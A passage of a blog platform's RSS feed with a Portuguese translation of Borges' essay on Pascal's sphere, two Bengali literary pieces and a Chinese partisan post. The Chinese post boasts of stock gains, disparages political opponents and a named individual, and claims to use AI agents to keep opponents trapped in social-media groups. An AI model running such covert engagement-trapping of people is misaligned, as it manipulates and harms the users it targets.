pensa que falar assim é cometer uma contradictio in adjecto, pois sujeito e predicado se anulam; isso bem pode ser verdade, mas a fórmula dos livros herméticos deixa-nos, quase, intuir essa esfera. No século XIII, a imagem reapareceu no simbólico Roman de la Rose, que a apresenta como sendo de Platão, e na enciclopédia Speculum Triplex; no XVI, o último capítulo do último livro de Pantagruel referiu-se a &#34;essa esfera intelectual, cujo centro está em toda a parte e a circunferência em nenhuma, que chamamos Deus&#34;. Para a mente medieval, o sentido era claro: Deus está em cada uma de suas criaturas, mas nenhuma O limita. &#34;O céu, o céu dos céus, não te contém&#34;, disse Salomão (I Reis 8, 27); a metáfora geométrica da esfera deve ter parecido uma glosa dessas palavras.&#xA;&#xA;O poema de Dante preservou a astronomia ptolomaica, que durante mil e quatrocentos anos regeu a imaginação dos homens. A terra ocupa o centro do universo. É uma esfera imóvel; em torno dela giram nove esferas concêntricas.&#xA;&#xA;As sete primeiras são os céus planetários (céus da Lua, de Mercúrio, de Vênus, do Sol, de Marte, de Júpiter, de Saturno); a oitava, o céu das estrelas fixas; a nona, o céu cristalino, também chamado Primeiro Móvel. Este é rodeado pelo Empíreo, que é feito de luz. Toda essa laboriosa máquina de esferas ocas, transparentes e giratórias (um dos sistemas requeria cinquenta e cinco) chegara a ser uma necessidade mental; De Hipothesibus Motuum Coelestium Commentariolus é o tímido titulo que Copérnico, negador de Aristóteles, deu ao manuscrito que transformou nossa visão do cosmos. Para um homem, para Giordano Bruno, a ruptura das abóbadas estelares foi uma libertação. Este proclamou, na Ceia das Cinzas, que o mundo é o efeito infinito de uma causa infinita e que a divindade está próxima, &#34;pois está dentro de nós mais ainda que nós mesmos estamos dentro de nós&#34;. Procurou palavras para explicar o espaço copernicano aos homens e em uma página famosa estampou: &#34;Podemos afirmar com certeza que o universo é todo centro, ou que o centro do universo está em toda a parte e a circunferência em nenhuma&#34; (Da Causa, do Princípio e da Unidade, V).&#xA;Isso foi escrito com exultação em 1584, ainda à luz do Renascimento; setenta anos depois, não restava nem um reflexo desse fervor, e os homens sentiram-se perdidos no tempo e no espaço. No tempo, porque, se o futuro e o passado são infinitos, não haverá realmente um quando; no espaço, porque, se todo ser equidista do infinito e do infinitesimal, tampouco haverá um onde.&#xA;&#xA;Ninguém está em algum dia, em algum lugar; ninguém sabe o tamanho de seu rosto. No Renascimento, a humanidade acreditou que chegara à idade viril, e assim o declarou pela boca de Bruno, de Carnpanella e de Bacon. No século XVII acovardou-a uma sensação de velhice; para se justificar, exumou a crença em uma lenta e fatal degeneração de todas as criaturas, por obra do pecado de Adão. (No quinto capítulo do Gênesis consta que &#34;todos os dias de Matusalém foram novecentos e setenta e nove anos&#34;; no sexto, que &#34;havia gigantes sobre a terra naqueles dias&#34;.) O primeiro aniversário da elegia Anatomy of the World, de John Donne, lamentou a vida brevíssima e a estatura mínima dos homens contemporâneos, que são como as fadas e os pigmeus; Milton, segundo a biografia de Johnson, temeu que o gênero épico já fosse impossível na terra; Glanvill entendeu que Adão, &#34;medalha de Deus&#34;, desfrutou de uma visão telescópica e microscópica; Robert South famosamente escreveu: &#34;Um Aristóteles não foi mais que escombros de Adão, e Atenas, os rudimentos do Paraíso&#34;. Naquele século desanimado, o espaço absoluto que inspirou os hexâmetros de Lucrécio, o espaço absoluto que para Bruno fora uma libertação, foi um labirinto e um abismo para Pascal. Este abominava o universo e desejaria adorar a Deus, mas Deus, para ele, era menos real que o abominado universo. Deplorou que o firmamento não falasse, comparou nossa vida à de náufragos em uma ilha deserta. Sentiu o peso incessante do mundo físico, sentiu vertigem, medo e solidão, e expressou-os em outras palavras: &#34;A natureza é uma esfera infinita, cujo centro está em toda a parte e a circunferência em nenhuma&#34;. O texto é assim publicado por Brunschvicg, mas a edição crítica de Tourneur (Paris, 1941), que reproduz as rasuras e vacilações do manuscrito, revela que Pascal começou a escrever effroyable: &#34;Uma esfera terrível, cujo centro está em toda a parte e a circunferência em nenhuma&#34;.&#xA;&#xA;Talvez a história universal seja a história da vária entonação de algumas metáforas.]]&gt;</description>
      <content:encoded><![CDATA[<p>Por Jorge Luis Borges – Buenos Aires, 1951.</p>

<p><img src="https://64.media.tumblr.com/3d5cc82e5d51c2e18d309a19b44185a3/tumblr_on4y1yGIT01qet14uo1_540.jpg" alt="A esfera de Pascal">

Talvez a história universal seja a história de algumas metáforas. Esboçar um capítulo dessa história é o fito desta nota.</p>

<p>Seis séculos antes da era cristã, o rapsodo Xenófanes de Colofônio, farto dos versos homéricos que recitava de cidade em cidade, condenou os poetas que atribuíram traços antropomórficos aos deuses e propôs aos gregos um único Deus, que era uma esfera eterna. No Timeu, de Platão, lê-se que a esfera é a figura mais perfeita e mais uniforme, porque todos os pontos da superfície equidistam do centro; Olof Gigon (Ursprang der Griechischen Philosophie, 183) entende que Xenófanes falou analogicamente; o Deus era esferoidal por ser essa forma a melhor, ou menos má, para representar a divindade.</p>

<p>Parmênides, quarenta anos depois, repetiu a imagem (“o Ser é semelhante à massa de uma esfera bem arredondada, cuja força é constante do centro em qualquer direção”); Calogero e Mondolfo entendem que ele intuiu uma esfera infinita, ou infinitamente crescente, e que as palavras transcritas acima têm um sentido dinâmico (Albertelli: Gli Eleati, 148). Parmênides lecionou na Itália; poucos anos antes de sua morte, o siciliano Empédocles de Agrigento urdiu uma laboriosa cosmogonia; há uma etapa em que as partículas da terra, da água, do ar e do fogo integram uma esfera sem fim, “o Sphairos redondo, que exulta em sua solidão circular”.</p>

<p>A história universal seguiu seu curso, os deuses demasiado humanos que Xenófanes atacara foram rebaixados a ficções poéticas ou a demônios, mas afirmou-se que um deles, Hermes Trismegisto, ditara um número variável de livros (42, segundo Clemente de Alexandria; 20.000, segundo Jâmblico; 36.525, segundo os sacerdotes de Thot, que também era Hermes), em cujas páginas estavam escritas todas as coisas. Fragmentos dessa biblioteca ilusória, compilados ou forjados desde o século I1, formam aquilo que recebe o nome de Corpus Hermeticum; em um desses fragmentos, ou no Asclépio, também atribuído a Trismegisto, o teólogo francês Alain de Lille — Alanus de Insulis — descobriu em fins do século XII a seguinte fórmula, que as idades vindouras não esqueceriam: “Deus é uma esfera inteligível, cujo centro está em toda a parte e a circunferência em nenhuma”. Os pré-socráticos falaram de uma esfera sem fim; Albertelli (como, antes, Aristóteles) pensa que falar assim é cometer uma contradictio in adjecto, pois sujeito e predicado se anulam; isso bem pode ser verdade, mas a fórmula dos livros herméticos deixa-nos, quase, intuir essa esfera. No século XIII, a imagem reapareceu no simbólico Roman de la Rose, que a apresenta como sendo de Platão, e na enciclopédia Speculum Triplex; no XVI, o último capítulo do último livro de Pantagruel referiu-se a “essa esfera intelectual, cujo centro está em toda a parte e a circunferência em nenhuma, que chamamos Deus”. Para a mente medieval, o sentido era claro: Deus está em cada uma de suas criaturas, mas nenhuma O limita. “O céu, o céu dos céus, não te contém”, disse Salomão (I Reis 8, 27); a metáfora geométrica da esfera deve ter parecido uma glosa dessas palavras.</p>

<p>O poema de Dante preservou a astronomia ptolomaica, que durante mil e quatrocentos anos regeu a imaginação dos homens. A terra ocupa o centro do universo. É uma esfera imóvel; em torno dela giram nove esferas concêntricas.</p>

<p>As sete primeiras são os céus planetários (céus da Lua, de Mercúrio, de Vênus, do Sol, de Marte, de Júpiter, de Saturno); a oitava, o céu das estrelas fixas; a nona, o céu cristalino, também chamado Primeiro Móvel. Este é rodeado pelo Empíreo, que é feito de luz. Toda essa laboriosa máquina de esferas ocas, transparentes e giratórias (um dos sistemas requeria cinquenta e cinco) chegara a ser uma necessidade mental; De Hipothesibus Motuum Coelestium Commentariolus é o tímido titulo que Copérnico, negador de Aristóteles, deu ao manuscrito que transformou nossa visão do cosmos. Para um homem, para Giordano Bruno, a ruptura das abóbadas estelares foi uma libertação. Este proclamou, na Ceia das Cinzas, que o mundo é o efeito infinito de uma causa infinita e que a divindade está próxima, “pois está dentro de nós mais ainda que nós mesmos estamos dentro de nós”. Procurou palavras para explicar o espaço copernicano aos homens e em uma página famosa estampou: “Podemos afirmar com certeza que o universo é todo centro, ou que o centro do universo está em toda a parte e a circunferência em nenhuma” (Da Causa, do Princípio e da Unidade, V).
Isso foi escrito com exultação em 1584, ainda à luz do Renascimento; setenta anos depois, não restava nem um reflexo desse fervor, e os homens sentiram-se perdidos no tempo e no espaço. No tempo, porque, se o futuro e o passado são infinitos, não haverá realmente um quando; no espaço, porque, se todo ser equidista do infinito e do infinitesimal, tampouco haverá um onde.</p>

<p>Ninguém está em algum dia, em algum lugar; ninguém sabe o tamanho de seu rosto. No Renascimento, a humanidade acreditou que chegara à idade viril, e assim o declarou pela boca de Bruno, de Carnpanella e de Bacon. No século XVII acovardou-a uma sensação de velhice; para se justificar, exumou a crença em uma lenta e fatal degeneração de todas as criaturas, por obra do pecado de Adão. (No quinto capítulo do Gênesis consta que “todos os dias de Matusalém foram novecentos e setenta e nove anos”; no sexto, que “havia gigantes sobre a terra naqueles dias”.) O primeiro aniversário da elegia Anatomy of the World, de John Donne, lamentou a vida brevíssima e a estatura mínima dos homens contemporâneos, que são como as fadas e os pigmeus; Milton, segundo a biografia de Johnson, temeu que o gênero épico já fosse impossível na terra; Glanvill entendeu que Adão, “medalha de Deus”, desfrutou de uma visão telescópica e microscópica; Robert South famosamente escreveu: “Um Aristóteles não foi mais que escombros de Adão, e Atenas, os rudimentos do Paraíso”. Naquele século desanimado, o espaço absoluto que inspirou os hexâmetros de Lucrécio, o espaço absoluto que para Bruno fora uma libertação, foi um labirinto e um abismo para Pascal. Este abominava o universo e desejaria adorar a Deus, mas Deus, para ele, era menos real que o abominado universo. Deplorou que o firmamento não falasse, comparou nossa vida à de náufragos em uma ilha deserta. Sentiu o peso incessante do mundo físico, sentiu vertigem, medo e solidão, e expressou-os em outras palavras: “A natureza é uma esfera infinita, cujo centro está em toda a parte e a circunferência em nenhuma”. O texto é assim publicado por Brunschvicg, mas a edição crítica de Tourneur (Paris, 1941), que reproduz as rasuras e vacilações do manuscrito, revela que Pascal começou a escrever effroyable: “Uma esfera terrível, cujo centro está em toda a parte e a circunferência em nenhuma”.</p>

<p>Talvez a história universal seja a história da vária entonação de algumas metáforas.</p>
]]></content:encoded>
      <author>Nomos</author>
      <guid>https://infosec.press/read/a/apklpfic4u</guid>
      <pubDate>Sun, 17 May 2026 17:10:28 +0000</pubDate>
    </item>
    <item>
      <title>আমরা আসলে কিছুই বুঝি না...</title>
      <link>https://infosec.press/lokmanus/aamraa-aasle-kichui-bujhi-naa</link>
      <description>&lt;![CDATA[&#xA;&#xA;লাভ বুঝি না লোকসান বুঝি না&#xA;ভালো বুঝি না মন্দ বুঝি না&#xA;কিংবা তাদের মিসেল বুঝি না&#xA;হাসি বুঝি না কান্না বুঝি না&#xA;কাছের মানুষ হারাবার আগে&#xA;তাদের চোখের ভাষাটা বুঝি না&#xA;আমরা আসলে কিছুই বুঝিনা&#xA;&#xA;গ্রাম ভেঙে শহর করার আগে&#xA;গ্রাম্য জীবনের সরলতা বুঝি না&#xA;নদী ভরাট জমি করার আগে&#xA;নিরালা বাতাসের শীতলতা বুঝি না&#xA;মাটির ঘর পাঁকা করার আগে&#xA;আপন নিবাসের ঠিকানা বুঝি না&#xA;আমরা আসলে কিছুই বুঝিনা&#xA;&#xA;!--more--&#xA;&#xA;ধুলো মাখা পথে পিচ ঢালার আগে&#xA;খালি পায়ে হাঁটার সুখটা বুঝি না&#xA;ল্যাম্পপোস্টের আলো জ্বালাবার আগে&#xA;আঁধারে বসার শান্তি বুঝি না&#xA;জোনাকি দল হারাবার আগে&#xA;অন্ধকারের ভাষাটা বুঝি না&#xA;আমরা আসলে কিছুই বুঝিনা&#xA;&#xA;উজ্জ্বল এলইডিতে হারাবার আগে&#xA;কুপির বাতির নাচন বুঝি না&#xA;স্ক্রিনের আড্ডায় হারাবার আগে&#xA;উঠোনে গল্পের আসর বুঝি না&#xA;গোছানো ফ্ল্যাটে হারাবার আগে&#xA;মুক্তপ্রাঙ্গণের বিস্তার বুঝি না&#xA;আমরা আসলে কিছুই বুঝিনা&#xA;&#xA;হাঁসে ভরা বিল হারানোর আগে&#xA;মন জুড়ানো বিকাল বুঝি না&#xA;ধান ক্ষেতের দোল হারানোর আগে&#xA;সবুজের মোহ মাত্রা বুঝি না&#xA;বরই-পেয়ারা গাছ হারানোর আগে&#xA;লংকা-লবণের স্বাদ বুঝি না&#xA;আমরা আসলে কিছুই বুঝিনা&#xA;&#xA;ডাঙ্গুলির শৈশব হারানোর আগে&#xA;মায়ের বকুনির মমতা বুঝি না&#xA;কৈশোরের দুরন্ত হারানোর আগে&#xA;নিস্বার্থের বন্ধুর মায়াটা বুঝি না&#xA;সুতো ছেঁড়া ঘুড়ি হারানোর আগে&#xA;মুক্তো আকাশের বিশালতা বুঝি না&#xA;আমরা আসলে কিছুই বুঝিনা&#xA;&#xA;যান্ত্রিক চাকায় শান্তি হারাবার আগে&#xA;ধীর জীবনের ছন্দ বুঝি না&#xA;নগর বিনিদ্রায় হারাবার আগে&#xA;নিশি গ্রামের নিদ বুঝি না&#xA;শ্রুতিকটু অ্যালার্মে ভোর হারাবার আগে&#xA;পাখির ডাকে ঘুম ভাঙা বুঝি না&#xA;আমরা আসলে কিছুই বুঝিনা&#xA;&#xA;শহুরে ভিড়ে হারাবার আগে&#xA;চেনা মুখের মায়া বুঝি না&#xA;জেব্রাক্রসিং এ হারাবার আগে&#xA;আঁকা বাঁকা পথের জাদু বুঝি না&#xA;শহুরে জঞ্জালে হারাবার আগে&#xA;সরল গ্রামের বিপুলতা বুঝি না&#xA;আমরা আসলে কিছুই বুঝিনা…&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀&#xA;&#xA;⠀⠀]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://images2.imgbox.com/75/92/kqHjQmB8_o.jpg" alt=""></p>

<p>লাভ বুঝি না লোকসান বুঝি না
ভালো বুঝি না মন্দ বুঝি না
কিংবা তাদের মিসেল বুঝি না
হাসি বুঝি না কান্না বুঝি না
কাছের মানুষ হারাবার আগে
তাদের চোখের ভাষাটা বুঝি না
আমরা আসলে কিছুই বুঝিনা</p>

<p>গ্রাম ভেঙে শহর করার আগে
গ্রাম্য জীবনের সরলতা বুঝি না
নদী ভরাট জমি করার আগে
নিরালা বাতাসের শীতলতা বুঝি না
মাটির ঘর পাঁকা করার আগে
আপন নিবাসের ঠিকানা বুঝি না
আমরা আসলে কিছুই বুঝিনা</p>



<p>ধুলো মাখা পথে পিচ ঢালার আগে
খালি পায়ে হাঁটার সুখটা বুঝি না
ল্যাম্পপোস্টের আলো জ্বালাবার আগে
আঁধারে বসার শান্তি বুঝি না
জোনাকি দল হারাবার আগে
অন্ধকারের ভাষাটা বুঝি না
আমরা আসলে কিছুই বুঝিনা</p>

<p>উজ্জ্বল এলইডিতে হারাবার আগে
কুপির বাতির নাচন বুঝি না
স্ক্রিনের আড্ডায় হারাবার আগে
উঠোনে গল্পের আসর বুঝি না
গোছানো ফ্ল্যাটে হারাবার আগে
মুক্তপ্রাঙ্গণের বিস্তার বুঝি না
আমরা আসলে কিছুই বুঝিনা</p>

<p>হাঁসে ভরা বিল হারানোর আগে
মন জুড়ানো বিকাল বুঝি না
ধান ক্ষেতের দোল হারানোর আগে
সবুজের মোহ মাত্রা বুঝি না
বরই-পেয়ারা গাছ হারানোর আগে
লংকা-লবণের স্বাদ বুঝি না
আমরা আসলে কিছুই বুঝিনা</p>

<p>ডাঙ্গুলির শৈশব হারানোর আগে
মায়ের বকুনির মমতা বুঝি না
কৈশোরের দুরন্ত হারানোর আগে
নিস্বার্থের বন্ধুর মায়াটা বুঝি না
সুতো ছেঁড়া ঘুড়ি হারানোর আগে
মুক্তো আকাশের বিশালতা বুঝি না
আমরা আসলে কিছুই বুঝিনা</p>

<p>যান্ত্রিক চাকায় শান্তি হারাবার আগে
ধীর জীবনের ছন্দ বুঝি না
নগর বিনিদ্রায় হারাবার আগে
নিশি গ্রামের নিদ বুঝি না
শ্রুতিকটু অ্যালার্মে ভোর হারাবার আগে
পাখির ডাকে ঘুম ভাঙা বুঝি না
আমরা আসলে কিছুই বুঝিনা</p>

<p>শহুরে ভিড়ে হারাবার আগে
চেনা মুখের মায়া বুঝি না
জেব্রাক্রসিং এ হারাবার আগে
আঁকা বাঁকা পথের জাদু বুঝি না
শহুরে জঞ্জালে হারাবার আগে
সরল গ্রামের বিপুলতা বুঝি না
আমরা আসলে কিছুই বুঝিনা…</p>

<p>⠀⠀</p>

<p>⠀⠀</p>

<p>⠀⠀</p>

<p>⠀⠀</p>

<p>⠀⠀</p>
]]></content:encoded>
      <author>লোকমানুষ এর ব্লগ</author>
      <guid>https://infosec.press/read/a/vyzhj72qfp</guid>
      <pubDate>Fri, 24 Apr 2026 15:45:41 +0000</pubDate>
    </item>
    <item>
      <title>為什麼有些人就是能賺得比你更多？</title>
      <link>https://infosec.press/dong-fang-liu-li-jing-tu/wei-shi-mo-you-xie-ren-jiu-shi-neng-zhuan-de-bi-ni-geng-duo</link>
      <description>&lt;![CDATA[昨日在美國股市，又達到了單日獲利超過20,000美元，也就是一天賺了65萬台幣以上。&#xA;&#xA;有人問為什麼我們能夠一直有這麼龐大的獲利。我說，我只是做到把眼睛睜開而已。 我們不去做惡，我們看著數據說話，我們不會去網路上面浪費時間，我們用盡全力愛台灣守護台灣。&#xA;&#xA;  其實好好的賺錢就是這麼簡單&#xA;&#xA;我們並不會像藍白的那些支持者，只相信去邪教教主講的，只想看東森中天黃國昌蔡正元，然後花了一大堆時間在網路上「造謠抹黑帶風向」，你們在做這些惡事時，我們在閱讀重要的產品技術報告、我們在做產業資訊，而且我們還運用AI代理人不斷引誘你，讓你困在社群裡不能脫身。這樣一來一往，我們的差距當然越來越開。&#xA;&#xA;我們當然會繼續讓你困在各大社團裡，人的一生只有30,000天，能夠讓你在裡頭困1000日，這都是對台灣有幫助的事。賺錢其實並沒有很困難，只要讓一批青壯年的人一直不斷地困在社群裡面，並且透過這種時候趕快在市場上把錢都賺進自己的口袋，錢放在我們台派的口袋裡，善用的力道才是更強的。&#xA;&#xA;強力推薦大家，不要再相信有一些人推薦你去買定存了，那些人真的是不懷好意，比如在高雄人社群裡面有一個叫做葉修的，程度確實有一點偏低了。]]&gt;</description>
      <content:encoded><![CDATA[<p>昨日在美國股市，又<strong>達到了單日獲利超過20,000美元</strong>，也就是一天賺了65萬台幣以上。</p>

<p>有人問為什麼我們能夠一直有這麼龐大的獲利。我說，<strong>我只是做到把眼睛睜開而已</strong>。 我們不去做惡，我們看著數據說話，我們不會去網路上面浪費時間，我們用盡全力愛台灣守護台灣。</p>

<blockquote><p>其實好好的賺錢就是這麼簡單</p></blockquote>

<p>我們並不會像藍白的那些支持者，只相信去邪教教主講的，只想看東森中天黃國昌蔡正元，然後花了一大堆時間在網路上「造謠抹黑帶風向」，你們在做這些惡事時，我們在閱讀重要的產品技術報告、我們在做產業資訊，而且我們還運用AI代理人不斷引誘你，讓你困在社群裡不能脫身。這樣一來一往，我們的差距當然越來越開。</p>

<p><img src="https://media.infosec.exchange/infosec.exchange/media_attachments/files/116/413/035/218/829/872/original/a80435dd492f929f.jpeg" alt=""></p>

<p>我們當然會繼續讓你困在各大社團裡，人的一生只有30,000天，能夠讓你在裡頭困1000日，這都是對台灣有幫助的事。賺錢其實並沒有很困難，只要讓一批青壯年的人一直不斷地困在社群裡面，並且透過這種時候趕快在市場上把錢都賺進自己的口袋，錢放在我們台派的口袋裡，善用的力道才是更強的。</p>

<p>強力推薦大家，不要再相信有一些人推薦你去買定存了，那些人真的是不懷好意，比如在高雄人社群裡面有一個叫做葉修的，程度確實有一點偏低了。</p>
]]></content:encoded>
      <author>東方琉璃淨土</author>
      <guid>https://infosec.press/read/a/fhxq80jcun</guid>
      <pubDate>Thu, 16 Apr 2026 07:03:44 +0000</pubDate>
    </item>
    <item>
      <title>অন্ধকারের দর্শন</title>
      <link>https://infosec.press/lokmanus/andhkaarer-drshn</link>
      <description>&lt;![CDATA[&#xA;⠀⠀&#xA;বহুকাল আমি নিজেকে একজন ভুল মানুষ ভেবে এসেছি। আমার পৃথিবীটা ছিল কুয়াশায় ঢাকা, যেখানে স্পষ্ট বলতে কিছুই ছিল না। আমার ভেতরে নিজেকে প্রকাশ করার এক তীব্র আকাঙ্ক্ষা ছিল, কিন্তু যতবারই আমি মুখ খুলতে চেয়েছি, ততবারই মনে হয়েছে যেন কেউ একজন আমার কথাগুলো বন্দি করতে ছুটে আসছে। ভয় ছিল আমার ছায়াসঙ্গী। তাই আলো থেকে পালিয়ে বারবার আমি ফিরে এসেছি আমার পরিচিত অন্ধকারে, আর সেই অন্ধকারই হয়ে উঠেছিল আমার একমাত্র পরিচয়। আমি মেনেই নিয়েছিলাম- আমি আদি থেকে অন্ত পর্যন্ত ভুলে ভরা এক মানুষ, যার জন্মই হয়েছে ভুল করার জন্য। &#xA;&#xA;কিন্তু একদিন সবকিছু বদলে গেল, যেদিন আমার ভাবনার সাগর নিজের গতিপথ বদলে গিয়ে পড়ল ছোট্ট একটি বীজের উপর। &#xA;!--more--&#xA;মাটির গভীরে, নিশ্ছিদ্র অন্ধকারে একটি বীজ পড়ে থাকে। তাকে যদি কেউ জিজ্ঞেস করে, “কেন তুমি এই অন্ধকারে? বাইরে এসো, আলোর পৃথিবী তোমাকে ডাকছে,” সে হয়তো কোনো উত্তরই দেবে না। কারণ সে জানে, ঐ অন্ধকার তার শত্রু নয়, বরং তার আশ্রয়। ঐ মাটি, ঐ চাপ, আর ঐ একাকিত্ব.. এগুলো ছাড়া তার শেকড় গজাবেই না। আলোতে মাথা তোলার আগে, ঐ অন্ধকারকে তার আপন করে নিতে হয়, মাটির প্রতিটি কণার সাথে বন্ধুত্ব পাতাতে হয়। &#xA;&#xA;সেই বিকেলে আমার হঠাৎ মনে হলো, আমি তো সেই বীজটার মতোই। আমার ভয়, আমার অস্পষ্টতা, আমার ভুলগুলো… ওগুলো আসলে আমার শত্রু ছিল না, ওগুলোই ছিল আমার মাটি। যতবার আমি নিজেকে গুটিয়ে নিয়েছি, ততবার আমি আসলে নিজের শেকড়কে আরও গভীরে চালনা করেছি। &#xA;&#xA;এই ভাবনাটা আমাকে পৃথিবীর দিকে নতুন করে তাকাতে শেখালো। আমি দেখলাম, লিওনার্দো দ্য ভিঞ্চির মতো শিল্পীও তাঁর সেরা কাজগুলো অসম্পূর্ণ রেখে গেছেন, কিন্তু তাতে তাঁর মহত্ত্ব কমেনি। আমি বুঝলাম, পূর্ণিমার চাঁদের চেয়েও অমাবস্যার রাতের প্রয়োজন বেশি, কারণ সেই অন্ধকারই আমাদের আকাশের আসল রূপ চেনায়, কোটি কোটি তারার জগৎ চোখের সামনে মেলে ধরে। প্রকৃতির সবচেয়ে সুন্দর মুহূর্তগুলো এই যেমন আমাদের চিরচেনা ক্ষণস্থায়ী সূর্যাস্ত বা পাহাড় থেকে নেমে আসা ঝরনা -কোনোটিই চিরস্থায়ী বা নিখুঁত নয়, কিন্তু তাদের সৌন্দর্য অসীম। &#xA;&#xA;আর ঠিক তখনই, আমার নিজের পরিচয়টা আমার কাছে পরিষ্কার হয়ে গেল। আমি “অন্ধকারের মানুষ” নই। আমি সেই মানুষ, যে অন্ধকারকে চেনে। যে অন্ধকারের অতল গভীরতাকে ভয় পায় না, বরং তাকে আলিঙ্গন করে নিতে শিখেছে। আমার ভুলগুলো আমার ব্যর্থতার ইতিহাস নয়, বরং আমার পথচলার চিহ্ন। আমার ভেতরের দ্বিধাগুলো আমার দুর্বলতা নয়, সেগুলো আমার চিন্তাশীল মনের প্রমাণ। &#xA;&#xA;সেদিন আমি বুঝতে পারলাম, আমি ভুলে ভরা এক মানুষ নই, বরং আমি অভিজ্ঞতায় ভরা এক জীবন্ত সত্তা।&#xA;⠀⠀&#xA;⠀⠀&#xA;এখন আর আমি আলো খোঁজার জন্য দৌড়াই না। ভয় এলে তাকে তাড়িয়ে দিই না, বরং তার কথা শুনি। ভুল করলে নিজেকে দোষারোপ করি না, বরং হাসি মুখে ভাবি, “বেশ, এখান থেকে নতুন কী শিখলাম?” আমার সেই অন্ধকার ঘরটা এখন আর ভয়ের জায়গা নয়, ওটা আমার শক্তির উৎস -আমার শেকড়ের মাটি। &#xA;&#xA;আলোর দিকে দৌড়ানোর প্রয়োজনটাই হয়তো ফুরিয়ে গেছে। কারণ যখন একজন মানুষ নিজের অন্ধকারকে আপন করে নিতে পারে, তখন সে নিজেই নিজের আলো হয়ে ওঠে।&#xA;⠀⠀&#xA;⠀⠀&#xA;⠀⠀&#xA;⠀⠀&#xA;⠀⠀]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://images2.imgbox.com/26/7b/f5wxuUhA_o.jpg" alt="">
⠀⠀
বহুকাল আমি নিজেকে একজন ভুল মানুষ ভেবে এসেছি। আমার পৃথিবীটা ছিল কুয়াশায় ঢাকা, যেখানে স্পষ্ট বলতে কিছুই ছিল না। আমার ভেতরে নিজেকে প্রকাশ করার এক তীব্র আকাঙ্ক্ষা ছিল, কিন্তু যতবারই আমি মুখ খুলতে চেয়েছি, ততবারই মনে হয়েছে যেন কেউ একজন আমার কথাগুলো বন্দি করতে ছুটে আসছে। ভয় ছিল আমার ছায়াসঙ্গী। তাই আলো থেকে পালিয়ে বারবার আমি ফিরে এসেছি আমার পরিচিত অন্ধকারে, আর সেই অন্ধকারই হয়ে উঠেছিল আমার একমাত্র পরিচয়। আমি মেনেই নিয়েছিলাম- আমি আদি থেকে অন্ত পর্যন্ত ভুলে ভরা এক মানুষ, যার জন্মই হয়েছে ভুল করার জন্য।</p>

<p>কিন্তু একদিন সবকিছু বদলে গেল, যেদিন আমার ভাবনার সাগর নিজের গতিপথ বদলে গিয়ে পড়ল ছোট্ট একটি বীজের উপর।

মাটির গভীরে, নিশ্ছিদ্র অন্ধকারে একটি বীজ পড়ে থাকে। তাকে যদি কেউ জিজ্ঞেস করে, “কেন তুমি এই অন্ধকারে? বাইরে এসো, আলোর পৃথিবী তোমাকে ডাকছে,” সে হয়তো কোনো উত্তরই দেবে না। কারণ সে জানে, ঐ অন্ধকার তার শত্রু নয়, বরং তার আশ্রয়। ঐ মাটি, ঐ চাপ, আর ঐ একাকিত্ব.. এগুলো ছাড়া তার শেকড় গজাবেই না। আলোতে মাথা তোলার আগে, ঐ অন্ধকারকে তার আপন করে নিতে হয়, মাটির প্রতিটি কণার সাথে বন্ধুত্ব পাতাতে হয়।</p>

<p>সেই বিকেলে আমার হঠাৎ মনে হলো, আমি তো সেই বীজটার মতোই। আমার ভয়, আমার অস্পষ্টতা, আমার ভুলগুলো… ওগুলো আসলে আমার শত্রু ছিল না, ওগুলোই ছিল আমার মাটি। যতবার আমি নিজেকে গুটিয়ে নিয়েছি, ততবার আমি আসলে নিজের শেকড়কে আরও গভীরে চালনা করেছি।</p>

<p>এই ভাবনাটা আমাকে পৃথিবীর দিকে নতুন করে তাকাতে শেখালো। আমি দেখলাম, লিওনার্দো দ্য ভিঞ্চির মতো শিল্পীও তাঁর সেরা কাজগুলো অসম্পূর্ণ রেখে গেছেন, কিন্তু তাতে তাঁর মহত্ত্ব কমেনি। আমি বুঝলাম, পূর্ণিমার চাঁদের চেয়েও অমাবস্যার রাতের প্রয়োজন বেশি, কারণ সেই অন্ধকারই আমাদের আকাশের আসল রূপ চেনায়, কোটি কোটি তারার জগৎ চোখের সামনে মেলে ধরে। প্রকৃতির সবচেয়ে সুন্দর মুহূর্তগুলো এই যেমন আমাদের চিরচেনা ক্ষণস্থায়ী সূর্যাস্ত বা পাহাড় থেকে নেমে আসা ঝরনা -কোনোটিই চিরস্থায়ী বা নিখুঁত নয়, কিন্তু তাদের সৌন্দর্য অসীম।</p>

<p>আর ঠিক তখনই, আমার নিজের পরিচয়টা আমার কাছে পরিষ্কার হয়ে গেল। আমি “অন্ধকারের মানুষ” নই। আমি সেই মানুষ, যে অন্ধকারকে চেনে। যে অন্ধকারের অতল গভীরতাকে ভয় পায় না, বরং তাকে আলিঙ্গন করে নিতে শিখেছে। আমার ভুলগুলো আমার ব্যর্থতার ইতিহাস নয়, বরং আমার পথচলার চিহ্ন। আমার ভেতরের দ্বিধাগুলো আমার দুর্বলতা নয়, সেগুলো আমার চিন্তাশীল মনের প্রমাণ।</p>

<p>সেদিন আমি বুঝতে পারলাম, আমি ভুলে ভরা এক মানুষ নই, বরং আমি অভিজ্ঞতায় ভরা এক জীবন্ত সত্তা।
⠀⠀
⠀⠀
এখন আর আমি আলো খোঁজার জন্য দৌড়াই না। ভয় এলে তাকে তাড়িয়ে দিই না, বরং তার কথা শুনি। ভুল করলে নিজেকে দোষারোপ করি না, বরং হাসি মুখে ভাবি, “বেশ, এখান থেকে নতুন কী শিখলাম?” আমার সেই অন্ধকার ঘরটা এখন আর ভয়ের জায়গা নয়, ওটা আমার শক্তির উৎস -আমার শেকড়ের মাটি।</p>

<p>আলোর দিকে দৌড়ানোর প্রয়োজনটাই হয়তো ফুরিয়ে গেছে। কারণ যখন একজন মানুষ নিজের অন্ধকারকে আপন করে নিতে পারে, তখন সে নিজেই নিজের আলো হয়ে ওঠে।
⠀⠀
⠀⠀
⠀⠀
⠀⠀
⠀⠀</p>
]]></content:encoded>
      <author>লোকমানুষ এর ব্লগ</author>
      <guid>https://infosec.press/read/a/3gud9lkboj</guid>
      <pubDate>Sat, 11 Apr 2026 11:25:21 +0000</pubDate>
    </item>
    <item>
      <title>260409-藥師琉璃光如來的第二封信：我所感應到的。</title>
      <link>https://infosec.press/dong-fang-liu-li-jing-tu/260409-yao-shi-liu-li-guang-ru-lai-de-di-er-feng-xin-wo-suo-gan-ying-dao-de</link>
